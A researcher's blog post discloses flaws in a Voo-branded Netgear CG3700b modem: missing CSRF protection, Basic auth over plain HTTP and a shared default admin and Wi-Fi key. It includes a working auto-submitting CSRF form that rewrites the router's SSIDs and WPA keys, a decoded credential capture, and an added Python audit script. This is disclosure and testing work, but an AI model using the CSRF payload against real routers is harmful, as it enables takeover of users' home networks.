
Voo branded Netgear CG3700b Vulnerabilities

Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.

Voo branded Netgear CG3700b Vulnerabilities – Introduction

As 90 days have passed since I disclosed them to the vendor (see timeline below), it is time to publicly disclose my findings and payloads.

CVEs are still pending, but I will add them to this post when I receive them.

Cross-Site Request Forgery (CSRF) on all form POSTs

The Voo branded Netgear CG3700b custom firmware (newest version at the time of writing, V2.02.03) performs no anti-CSRF check on any of the configuration POST handlers under /goform/: the forms carry no per-request token, and because the administrative session is HTTP Basic authentication, the browser attaches the cached credentials to any request that a third-party page makes to 192.168.0.1. By tricking a logged-in user into following a specially crafted link, a (context-dependent) attacker can modify every setting, including the WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Before settings: [screenshot: Netgear CG3700b Vulnerabilities - Before CSRF]

Example CSRF form (a page that, when loaded by a user whose browser has cached the modem's Basic credentials, replaces the 2.4 GHz and 5 GHz SSIDs and WPA keys):

<!-- Hidden form posting to the /goform/index handler; the browser adds the cached Basic auth header. -->
<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
<input type="hidden" name="group_parametrage_wifi" value="active">
<input type="hidden" name="reseau_wifi_name" value="NEWSSID">
<input type="hidden" name="nom_select" value="AUTO-PSK">
<input type="hidden" name="canal" value="0">
<input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
<input type="hidden" name="NBandwidth" value="20">
<input type="hidden" name="group_parametrage_wifi_an" value="active">
<input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
<input type="hidden" name="nom_select_an" value="AUTO-PSK">
<input type="hidden" name="canal_an" value="0">
<input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
<input type="hidden" name="NBandwidth_an" value="20">
<input type="hidden" name="group_fon" value="desactiver">
<input type="hidden" name="buttonApply" value="1">
<input type="hidden" name="only_mode" value="0">
<input type="hidden" name="selected_ch_an" value="1">
</form>
<!-- Submit automatically so that merely following the link triggers the request. -->
<script>document.form0.submit();</script>

After CSRF: [screenshot: Netgear CG3700b Vulnerabilities - After CSRF]

Insufficient Authentication (OWASP-A2)

This same modem authenticates the administrative interface with HTTP Basic authentication over the default plain-HTTP (non-TLS) connection. Basic authentication only base64-encodes username:password, it does not encrypt it, and the browser re-sends the header with every request, not just at login. Anyone able to observe the traffic between the administrator's browser and the router, for example from a position on the same network segment, can therefore decode the credentials and authenticate to the router themselves.

Example:

POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE

Screenshot: [Netgear CG3700b Vulnerabilities - Basic Auth]

root@kali:~# cat voo.txt 
dm9vOlBBU1NXT1JE
root@kali:~# base64 --decode voo.txt 
voo:PASSWORD

Insufficient Authentication (OWASP-A2) – Shared Administrative and Wi-Fi Key

The Voo Netgear CG3700b also ships, by default, with the same secret as both the administrative console password and the wireless WPA2 pre-shared key.

The two systems therefore fail together rather than independently: whoever obtains the key by any route has both. The default key is drawn from a known charset (A-Z) and is 8 characters long, which gives 26^8 ≈ 2.1 × 10^11 possibilities, roughly 37.6 bits. If a WPA2 weakness ever made recovering the PSK simple, if the HTTP basic authentication were brute forced over that keyspace, if the credential were sniffed as shown above, or if some other vulnerability exposed either secret, the attacker would gain both the wireless network and full administrative control of the router instead of just one.
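The checks a tester would run on a capture like the one above, written here as an added example that is not part of the original post and not Netgear's or Voo's code: parse the raw request, decode the Basic credential, test whether the password has the 8-letter A-Z shape of the factory default, and confirm that the /goform/ POST carries nothing that could act as an anti-CSRF token. The captured request is constructed from the headers shown above plus a short form body built from the /goform/index field names (the real parametre_config upload shown above is 24721 bytes); the page's placeholder 'PASSWORD' happens to be 8 uppercase letters, so the default-shape check fires on it. The TOKEN_HINTS list and the rule "treat the request as plain HTTP unless the request line says https" are assumptions of this example.

```python
"""Audit a captured CG3700b admin request for the weaknesses described above.

Added example, not from the original post. CAPTURED_REQUEST is constructed
from the headers shown on the page plus a body using the /goform/ field names
from the CSRF form; 'PASSWORD' is the page's placeholder credential.
"""
import base64
import math
import re
from urllib.parse import parse_qs

# Constructed sample: the page's headers with a short form body instead of
# the 24721-byte configuration upload.
CAPTURED_REQUEST = (
    "POST http://192.168.0.1/goform/index HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "Connection: keep-alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Authorization: Basic dm9vOlBBU1NXT1JE\r\n"
    "\r\n"
    "group_parametrage_wifi=active&reseau_wifi_name=NEWSSID&nom_select=AUTO-PSK"
    "&mot_de_passe=NEWWPAKEY&buttonApply=1"
)

# Assumption: a field or header whose name contains one of these fragments is
# treated as an anti-CSRF token. Absence of such a name is the finding.
TOKEN_HINTS = ("csrf", "xsrf", "token", "nonce")

# Factory-default shape stated on the page: 8 characters drawn from A-Z.
DEFAULT_KEY_RE = re.compile(r"^[A-Z]{8}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, url, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, url, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, url, headers, body


def decode_basic(headers):
    """Return (user, password) from an Authorization: Basic header, or None.

    Basic auth is base64, not encryption: this is the whole 'attack'.
    """
    auth = headers.get("authorization", "")
    scheme, _, blob = auth.partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    decoded = base64.b64decode(blob).decode("utf-8", "replace")
    user, _, password = decoded.partition(":")
    return user, password


def looks_like_factory_default(password):
    """True if the password has the 8-uppercase-letter default shape."""
    return bool(DEFAULT_KEY_RE.match(password))


def default_keyspace_bits():
    """Entropy of an 8-character A-Z key: log2(26**8), about 37.6 bits."""
    return math.log2(26 ** 8)


def has_csrf_defence(headers, body):
    """True only if some field or header name looks like a CSRF token."""
    fields = parse_qs(body, keep_blank_values=True)
    for name in list(fields) + list(headers):
        if any(hint in name.lower() for hint in TOKEN_HINTS):
            return True
    return False


def audit(raw):
    """Return the list of findings for one captured request."""
    method, url, headers, body = parse_request(raw)
    findings = []
    creds = decode_basic(headers)
    # Assumption: anything not explicitly https in the request line is plaintext.
    if creds and not url.lower().startswith("https://"):
        findings.append(f"basic-auth over plain HTTP: {creds[0]}:{creds[1]}")
        if looks_like_factory_default(creds[1]):
            findings.append("password matches factory-default shape [A-Z]{8}")
    if method == "POST" and "/goform/" in url and not has_csrf_defence(headers, body):
        findings.append("state-changing /goform/ POST without anti-CSRF token")
    return findings


if __name__ == "__main__":
    for finding in audit(CAPTURED_REQUEST):
        print("-", finding)
    print(f"default key space: 26^8 = {26 ** 8:,} (~{default_keyspace_bits():.1f} bits)")
```

The token check is necessary but not sufficient evidence of CSRF: a server could still validate the Origin or Referer header, so on a live device confirm the finding by replaying the same POST with a foreign Origin and checking that the settings change.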

Disclosure Timeline

  • 2016-01-22 – Discovered vulnerability, initially notified vendor.
  • 2016-01-23 – Requested CVE.
  • 2016-03-07 – Contacted vendor again; they notified me that they will not fix these issues at this time.
  • 2016-04-20 – Attempted to contact Mitre again to receive CVE.
  • 2016-04-21 – Sent to Full Disclosure.
  • 2016-04-23 – Additional information and full disclosure published here.
  • 2016-04-26 – Resent to Full Disclosure due to some errors.
  • 2019-06-20 – Requested CVEs again with the new form.

Voo branded Netgear CG3700b Vulnerabilities – Conclusion

All in all, a fun weekend, and a few good findings.

The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.

I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.

8 Comments

  1. Hello,
    I read “2019-06-20 – Requested CVEs again with the new form.”
    Do you know if the vulnerabilities are still present in V2.03.03? It has been deployed approximately in 2017 by VOO (i.e. about one year after your report about 2.02.x). See e.g. https://forum.voo.be/ma-connexion-internet-17/interface-du-modem-netgear-bug-7852#post69290
    I have access to one such upgraded device if you like. (I mean you may or not still live in Belgium.)
    Thank you for your investigation and blog post
    Regards
    O.

    • I’m actually not sure, as I moved away from Belgium!

      That said, it should be easy enough to see if they still exist, based on this post alone.

      If you have any questions or information, then please let me know.
